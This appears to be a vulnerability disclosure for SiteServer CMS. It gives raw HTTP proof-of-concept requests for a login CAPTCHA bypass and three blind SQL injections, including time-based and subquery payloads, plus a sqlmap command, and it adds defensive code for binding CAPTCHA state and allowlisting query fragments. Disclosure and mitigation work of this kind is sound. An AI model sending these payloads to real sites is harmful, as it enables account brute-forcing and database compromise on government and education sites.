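SiteServer CMS is a website content management system developed by Beijing Bairong Qianyu Software Technology Development Co., Ltd. (北京百容千域软件技术开发有限公司). It is widely deployed by national ministries, corporate groups and large portal sites, and is especially common on Gov and Edu sites. It is an ASP.NET application, so auditing it is not easy. [sob, sob~]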

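0x01 Admin login CAPTCHA bypass

The application validates the CAPTCHA and the account credentials in two separate requests, and the two requests are not linked to each other. An attacker can therefore send the second request directly to test whether an account and password are correct, bypassing the CAPTCHA.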

POC

POST /api/v1/administrators/actions/login HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/SiteServer/pageLogin.cshtml
Content-Type: application/json;charset=utf-8
Content-Length: 84
Connection: keep-alive

{"account":"admin","password":"7fef6171469e80d32c0559f88b377245","isAutoLogin":true}

(The password field is simply the MD5 hash of the password.)
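The missing link between the two requests, shown as an added example that is not SiteServer's code: a framework-free model in which the login step either ignores the CAPTCHA outcome (the flow described above) or consumes a server-side, single-use record of it. The class, method names and the TTL value are hypothetical.

```python
import hmac
import secrets
import time

CAPTCHA_TTL = 120  # seconds a challenge or its solved state stays valid (assumed)


class LoginService:
    """Framework-free model of the two-request login; all names are hypothetical."""

    def __init__(self, users):
        self.users = users      # account -> password hash (constructed sample data)
        self.challenges = {}    # session id -> (expected answer, expiry)
        self.solved = {}        # session id -> expiry of the solved-CAPTCHA record

    def issue_captcha(self, session_id, now=None):
        now = time.time() if now is None else now
        answer = secrets.token_hex(3)
        self.challenges[session_id] = (answer, now + CAPTCHA_TTL)
        return answer  # a real application renders this as an image only

    def check_captcha(self, session_id, answer, now=None):
        """Request 1: verify the answer and record the outcome server-side."""
        now = time.time() if now is None else now
        expected, expiry = self.challenges.pop(session_id, (None, 0))  # single use
        ok = (expected is not None and now <= expiry
              and hmac.compare_digest(expected.encode(), answer.encode()))
        if ok:
            self.solved[session_id] = now + CAPTCHA_TTL
        return ok

    def login_unbound(self, account, password_hash):
        """Request 2 as described above: the CAPTCHA outcome is never consulted."""
        return self._credentials_ok(account, password_hash)

    def login_bound(self, session_id, account, password_hash, now=None):
        """Request 2 hardened: consume the solved-CAPTCHA record before anything else."""
        now = time.time() if now is None else now
        expiry = self.solved.pop(session_id, 0)  # spent on every attempt, pass or fail
        if now > expiry:
            return False
        return self._credentials_ok(account, password_hash)

    def _credentials_ok(self, account, password_hash):
        stored = self.users.get(account)
        return stored is not None and hmac.compare_digest(
            stored.encode(), password_hash.encode())
```

Because the record is popped on every attempt, each password guess costs one solved CAPTCHA, which is the property the unlinked design loses.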

0x02 Three blind SQL injections in the admin back end

POC_1

Insert 1'" into a field of the POST body:

POST /SiteServer/settings/pageLogError.aspx HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/SiteServer/main.cshtml?siteId=1
Connection: keep-alive
Cookie: ASP.NET_SessionId=5vyakqhuu2rtwvblnorygurc;SS-ADMIN-TOKEN=rYwhRlUy1A0slash0c0add0oVj4VDE0CvBAX85G2dBwa93TmwEkeruzsEkVZiNgMXXO0add0Sl6esIB128JOJDb78vG3Z9PkosNmcFsDsr19aCI9HXJmpu2MBtJqFRNsLzcRl5z0slash0m0add0ClsU6wxc4myMoLvhfjQ5klJmGwSvad0add0cUpWcO7EvcWRt5wavRiqfmxkLcBT4B4MtqIHEBOx4MVHwhbYGuDIM1MCnPGQ71DkgWDj6ii40add03VdXQnk0equals00secret0;SS-LOGIN-CAPTCHA=UxpHCdBy2cs0equals00secret0;http://127.0.0.1/api/pages/cms/contents?siteId=1&channelId=1&page=1&1550057121935;BaiRong_Message_Success=;BaiRong_Message_Error=TAz4Xf3PSBuLgbpoVa4VFSUf0slash05eimbSaeVSJF3dT3fgAeC6icqxEypRJIElFh2v0slash00secret0;BaiRong_Message_Info=UKZD9ATQy1nIqXl6UMdKcFsqBWz6W0slash0zZwF0slash0zI3H3S1ea5xO1a8CH7GpPOgZfjceddzeRpe48tG620add0EfzngiL4RR0add0BLDmBmrHA4oDI8fhFDyFUeOim0tQGOg0add0YlAUpat9fZhvQT8yO4eGOcly70slash0OSdQ0equals00equals00secret0;pageRoleAdd=TbRoleName%3A%2CCblPermissions_0%3Atrue%2CCblPermissions_0%3Afalse%2CCblPermissions_1%3Atrue%2CCblPermissions_2%3Atrue%2CCblPermissions_3%3Atrue%2CCblPermissions_4%3Atrue%2CCblPermissions_5%3Atrue%2CCblPermissions_6%3Atrue%2CCblPermissions_7%3Atrue%2CCblPermissions_8%3Atrue
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 14041
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

1'"&DdlCategory=api&DdlPluginId=1&IDCollection=36550&TbDateFrom=01/01/1967&TbDateTo=01/01/1967&TbKeyword=1&__EVENTARGUMENT=1&__EVENTTARGET=1&__LASTFOCUS=1&__VIEWSTATE=[ViewState value omitted]&__VIEWSTATEGENERATOR=07C334A0

POC_2

Injection via the lastActivityDate parameter:

GET /SiteServer/settings/pageAdministrator.aspx?areaId=0&departmentId=0&keyword=1&lastActivityDate=3&order=1%2C(select%20case%20when%20(3*2*1=6%20AND%2000043=00043)%20then%201%20else%201*(select%20table_name%20from%20information_schema.tables)end)=1&pageNum=50&roleName= HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/SiteServer/main.cshtml?siteId=1
Connection: keep-alive
Cookie: ASP.NET_SessionId=5vyakqhuu2rtwvblnorygurc;SS-ADMIN-TOKEN=rYwhRlUy1A0slash0c0add0oVj4VDE0CvBAX85G2dBwa93TmwEkeruzsEkVZiNgMXXO0add0Sl6esIB128JOJDb78vG3Z9PkosNmcFsDsr19aCI9HXJmpu2MBtJqFRNsLzcRl5z0slash0m0add0ClsU6wxc4myMoLvhfjQ5klJmGwSvad0add0cUpWcO7EvcWRt5wavRiqfmxkLcBT4B4MtqIHEBOx4MVHwhbYGuDIM1MCnPGQ71DkgWDj6ii40add03VdXQnk0equals00secret0;SS-LOGIN-CAPTCHA=UxpHCdBy2cs0equals00secret0;http://127.0.0.1/api/pages/cms/contents?siteId=1&channelId=1&page=1&1550057121935;BaiRong_Message_Success=;BaiRong_Message_Error=i0add00slash0bUAz0add01XI2hZN8pRsYpOmkzeTQsRVlYSaVFiYYWhOnhpyKRNQlNw0equals00equals00secret0;BaiRong_Message_Info=WcVtq4mIguwAo2bGhcDt3Obpq790fuRLlT7SS6pI6rratdyRYvSQRFP42DK2gt2MH95POIgqPr2KgC1z40LtkBjF4I8A0slash06HZxrLk4z6YKWVsQU9vowYbppQphC5BUQ074Cs2sF6ATDEU9bWoiVNWudY0add020slash0EuT0gmVl93NcNxFg3kUJweDyL3ILbOMbGdbic62onCmXi3cXszjOGSPpGQbQ0equals00equals00secret0;pageRoleAdd=TbRoleName%3A%2CCblPermissions_0%3Atrue%2CCblPermissions_0%3Afalse%2CCblPermissions_1%3Atrue%2CCblPermissions_2%3Atrue%2CCblPermissions_3%3Atrue%2CCblPermissions_4%3Atrue%2CCblPermissions_5%3Atrue%2CCblPermissions_6%3Atrue%2CCblPermissions_7%3Atrue%2CCblPermissions_8%3Atrue
Accept: */*
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

POC_3

Injection via the searchType parameter:

GET /SiteServer/settings/pageUser.aspx?creationDate=0&groupId=-1&keyword=&lastActivityDate=0&loginCount=0&pageNum=0&searchType=if(now()=sysdate()%2Csleep(0)%2C0) HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/SiteServer/main.cshtml?siteId=1
Connection: keep-alive
Cookie: ASP.NET_SessionId=5vyakqhuu2rtwvblnorygurc;SS-ADMIN-TOKEN=rYwhRlUy1A0slash0c0add0oVj4VDE0CvBAX85G2dBwa93TmwEkeruzsEkVZiNgMXXO0add0Sl6esIB128JOJDb78vG3Z9PkosNmcFsDsr19aCI9HXJmpu2MBtJqFRNsLzcRl5z0slash0m0add0ClsU6wxc4myMoLvhfjQ5klJmGwSvad0add0cUpWcO7EvcWRt5wavRiqfmxkLcBT4B4MtqIHEBOx4MVHwhbYGuDIM1MCnPGQ71DkgWDj6ii40add03VdXQnk0equals00secret0;SS-LOGIN-CAPTCHA=UxpHCdBy2cs0equals00secret0;http://127.0.0.1/api/pages/cms/contents?siteId=1&channelId=1&page=1&1550057121935;BaiRong_Message_Success=;BaiRong_Message_Error=idkTNpaibsTVOTWNCIYHopjR5DQok0slash0MiixTCRtA1Zi2oDmbbNohhlKgAT5oxdRRk5mawKRRDf7Q0equals00secret0;BaiRong_Message_Info=UKZD9ATQy1nIqXl6UMdKcFsqBWz6W0slash0zZwF0slash0zI3H3S1ea5xO1a8CH7GpPOgZfjceddzeRpe48tG620add0EfzngiL4RR0add0BLDmBmrHA4oDI8fhFDyFUeOim0tQGOg0add0YlAUpat9fZhvQT8yO4eGOcly70slash0OSdQ0equals00equals00secret0;pageRoleAdd=TbRoleName%3A%2CCblPermissions_0%3Atrue%2CCblPermissions_0%3Afalse%2CCblPermissions_1%3Atrue%2CCblPermissions_2%3Atrue%2CCblPermissions_3%3Atrue%2CCblPermissions_4%3Atrue%2CCblPermissions_5%3Atrue%2CCblPermissions_6%3Atrue%2CCblPermissions_7%3Atrue%2CCblPermissions_8%3Atrue
Accept: */*
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

POC_1 proof-of-vulnerability screenshot:

sqlmap -r inject.txt

Important: when reproducing, first visit the URL from the PoC, save the resulting request to a file, and then hand that file to sqlmap.
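A mitigation sketch for list pages of this kind, added here and not taken from SiteServer's code: it assumes that request values such as searchType and order end up in the SQL text as column names, which bound parameters cannot protect, so they are mapped through fixed allowlists while the keyword is bound as a parameter. The table, column names and allowlist keys are hypothetical, and SQLite stands in for the real database.

```python
import sqlite3

# Hypothetical allowlists: request value -> fixed SQL fragment written by the developer.
ORDER_BY = {"name": "UserName ASC", "last_activity": "LastActivityDate DESC"}
SEARCH_COLUMNS = {"userName": "UserName", "email": "Email"}


def build_user_query(search_type, keyword, order):
    """Return (sql, params); raise ValueError for values outside the allowlists."""
    try:
        column = SEARCH_COLUMNS[search_type]
        order_sql = ORDER_BY[order]
    except KeyError as exc:
        raise ValueError(f"unsupported value: {exc.args[0]!r}") from None
    # Escape LIKE wildcards so the keyword only ever matches literally.
    escaped = keyword.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = (f"SELECT UserName FROM Users WHERE {column} LIKE ? ESCAPE '\\' "
           f"ORDER BY {order_sql}")
    return sql, [f"%{escaped}%"]


def search_users(conn, search_type, keyword, order):
    """Run the query; only allowlisted fragments ever reach the SQL text."""
    sql, params = build_user_query(search_type, keyword, order)
    return [row[0] for row in conn.execute(sql, params)]


def demo_db():
    """Constructed sample data in an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Users (UserName TEXT, Email TEXT, LastActivityDate TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)", [
        ("alice", "alice@example.test", "2019-02-01"),
        ("bob", "bob@example.test", "2019-02-10"),
    ])
    return conn
```

A rejected value should produce a generic error response and a log entry, since a searchType or order value outside the allowlist never occurs in normal use of the page.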
